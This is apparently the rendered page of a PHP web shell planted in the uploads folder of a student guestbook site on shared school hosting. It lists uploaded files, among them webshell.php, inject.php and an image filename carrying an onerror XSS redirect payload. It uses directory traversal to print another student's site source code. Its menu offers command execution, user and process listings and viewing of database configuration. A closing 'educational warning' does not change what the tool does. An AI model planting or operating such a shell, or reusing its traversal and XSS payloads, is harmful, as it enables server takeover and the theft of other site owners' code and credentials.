🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

πŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
πŸ“ ..
πŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
πŸ“„ 0tk5j14v024b1.jpg [view]
πŸ“„ 300px-Cursed_Cat.jpg [view]
πŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
πŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
πŸ“„ CV Jasper Kramp.png [view]
πŸ“„ Cat profile.png [view]
πŸ“„ Fronalpstock_big.jpg [view]
πŸ“„ Krik en las.jpg [view]
πŸ“„ Krik.jpg [view]
πŸ“„ Pino-dood-03.jpg [view]
πŸ“„ Shellz.php [view]
πŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
πŸ“„ Tux.svg.png [view]
πŸ“„ Z.png [view]
πŸ“„ android.jpg [view]
πŸ“„ apple.php [view]
πŸ“„ cianancatfish.jpg [view]
πŸ“„ downloads (1).jpeg [view]
πŸ“„ downloads.jpeg [view]
πŸ“„ epresso.jpg [view]
πŸ“„ fake_photo.png [view]
πŸ“„ hand.jpg [view]
πŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
πŸ“„ image.png [view]
πŸ“„ images.jpeg [view]
πŸ“„ info.php [view]
πŸ“„ inject.php [view]
πŸ“„ instant_redirect.jpg [view]
πŸ“„ japper.jpg [view]
πŸ“„ koekiemonster-3.jpg [view]
πŸ“„ logo.png [view]
πŸ“„ muis.jpg [view]
πŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
πŸ“„ picobellobv.jpeg [view]
πŸ“„ redirect.php [view]
πŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
πŸ“„ sdfsa.png [view]
πŸ“„ sneaky.svg [view]
πŸ“„ taylor.webp [view]
πŸ“„ test.html [view]
πŸ“„ testpreg.php [view]
πŸ“„ testpreg1.php [view]
πŸ“„ testtest.php.JPG [view]
πŸ“„ ultimate_attack.gif [view]
πŸ“„ ultimate_attack.php [view]
πŸ“„ ultimate_attack.svg [view]
πŸ“„ wallpaper.jpg [view]
πŸ“„ webshell.php [view]

πŸ“„ Viewing: ./../../../../586648.klas4s23.mid-ica.nl/public_html/VillaVerkenner/generateVillaPDF.php

<?php
require('fpdf/fpdf.php');
include 'includes/databaseConn.php';

$id = isset($_GET['id']) ? intval($_GET['id']) : 0;

$db = new Database();
$conn = $db->getConnection();

$stmt = $conn->prepare("SELECT * FROM villas WHERE villa_id = :id LIMIT 1");
$stmt->bindParam(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$villa = $stmt->fetch(PDO::FETCH_ASSOC);

$stmt = $conn->prepare("SELECT bestandspad AS image_main FROM fotos WHERE villa_id = :id AND is_hoofdfoto = 1 LIMIT 1");
$stmt->bindParam(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$mainPhoto = $stmt->fetch(PDO::FETCH_ASSOC);
$villa['image_main'] = $mainPhoto ? $mainPhoto['image_main'] : 'images/villa.png';

$stmt = $conn->prepare("SELECT bestandspad AS image_a FROM fotos WHERE villa_id = :id AND is_hoofdfoto = 0 LIMIT 4");
$stmt->bindParam(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$fotoOverig = $stmt->fetchAll(PDO::FETCH_ASSOC);

$stmt = $conn->prepare("
    SELECT e.naam 
    FROM eigenschappen e
    INNER JOIN villa_eigenschappen ve ON e.eigenschap_id = ve.eigenschap_id
    WHERE ve.villa_id = :id
");
$stmt->bindParam(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$eigenschappen = $stmt->fetchAll(PDO::FETCH_COLUMN);

// Fetch ligging tags (column is 'naam', not 'tag_naam')
$stmt = $conn->prepare("
    SELECT lt.naam 
    FROM ligging_tags lt
    INNER JOIN villa_ligging_tags vlt ON lt.tag_id = vlt.tag_id
    WHERE vlt.villa_id = :id
");
$stmt->bindParam(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$liggingTags = $stmt->fetchAll(PDO::FETCH_COLUMN);

$images = [];

if (!empty($fotoOverig)) {
    foreach ($fotoOverig as $foto) {
        $images[] = htmlspecialchars($foto['image_a']);
    }
}


if (!$villa) {
    die("Villa niet gevonden.");
}

class PDF extends FPDF
{
    function Header()
    {
        $barHeight = 18;
        $this->SetFillColor(25, 60, 91);
        $this->Rect(0, 0, $this->w, $barHeight, 'F'); // fill full width
        $this->SetY(3);
        $this->SetFont('Arial', 'B', 14);
        $this->SetTextColor(255, 255, 255);
        $this->Cell(0, $barHeight, 'Villa Verkenner - Villa Flyer', 0, 1, 'C', false);
        $this->Ln(6); // move content down
        if (file_exists('images/logo.png')) {
            $this->Image('images/logo.png', 10, 5, 30);
        }
    }
    function Footer()
    {
        $this->SetFillColor(25, 60, 91);
        $this->Rect(0, $this->h - 15, $this->w, 15, 'F'); // fill full width
        $this->SetY(-15);
        $this->SetFont('Arial', 'I', 8);
        $this->SetTextColor(128);
        $this->Cell(0, 10, 'Villa Verkenner Β© ' . date('Y'), 0, 0, 'C', true);
    }
}

$pdf = new PDF();
$pdf->AddPage();
$pdf->SetFont('Arial', '', 12);
$pdf->SetTextColor(0);
$pdf->Cell(0, 10, mb_convert_encoding($villa['titel'], 'ISO-8859-1', 'UTF-8'), 0, 1, 'C');
$pdf->Ln(5);

// Main image
$mainImage = !empty($villa['image_main']) ? $villa['image_main'] : 'images/villa.png';
if (file_exists($mainImage)) {
    $imgWidth = 90;
    $x = ($pdf->GetPageWidth() - $imgWidth) / 2;
    $pdf->Image($mainImage, $x, $pdf->GetY(), $imgWidth);
}

$pdf->SetXY(110, 40);
$pdf->Ln(75);

$pdf->SetFont('Arial', 'B', 14);
$pdf->Cell(0, 10, 'Omschrijving', 0, 1, 'C');
$pdf->SetFont('Arial', '', 12);
$pdf->MultiCell(0, 8, mb_convert_encoding($villa['omschrijving'], 'ISO-8859-1', 'UTF-8'), 0, 'C');
$pdf->Ln(10);
$pdf->Ln(10);

$pdf->SetFont('Arial', 'B', 14);
$pdf->Cell(0, 10, 'Kenmerken', 0, 1, 'C');
$pdf->SetFont('Arial', '', 12);
$features = [
    'Locatie: ' . $villa['plaats'],
    'Capaciteit: ' . $villa['capaciteit'] . ' personen',
    'Ligging: ' . (!empty($liggingTags) ? implode(', ', $liggingTags) : 'N.v.t.'),
    'Eigenschappen: ' . (!empty($eigenschappen) ? implode(', ', $eigenschappen) : 'N.v.t.'),
    'Prijs per nacht: EUR' . number_format($villa['prijs_per_nacht'], 2, ',', '.'),
    'Aantal slaapkamers: ' . $villa['slaapkamers'],
    'Aantal badkamers: ' . $villa['badkamers'],
];
foreach ($features as $feature) {
    $pdf->Cell(0, 8, mb_convert_encoding($feature, 'ISO-8859-1', 'UTF-8'), 0, 1);
}
$pdf->Ln(10);

$pdf->SetFont('Arial', 'B', 14);
$pdf->Cell(0, 10, 'Galerij', 0, 1, 'C');
$pdf->SetFont('Arial', '', 12);

$x = 10;
$y = $pdf->GetY();

if (!empty($images)) {
    foreach ($images as $imgPath) {
        if (file_exists($imgPath)) {
            $pdf->Image($imgPath, $x, $y, 45, 35);
            $x += 50;
            if ($x > 160) {
                $x = 10;
                $y += 40;
            }
        }
    }
} else {
    $pdf->Cell(0, 10, 'Geen extra foto’s beschikbaar.', 0, 1, 'C');
}


$pdf->Output('D', 'Villa_' . preg_replace('/[^a-zA-Z0-9]/', '', $villa['titel']) . '.pdf');
exit;

🎯 Available Actions

Command Execution:

Quick Commands:

πŸ“‹ List files | πŸ‘€ Show user | πŸ“ Show directory | πŸ”„ Show processes | πŸ” Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | πŸ” View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!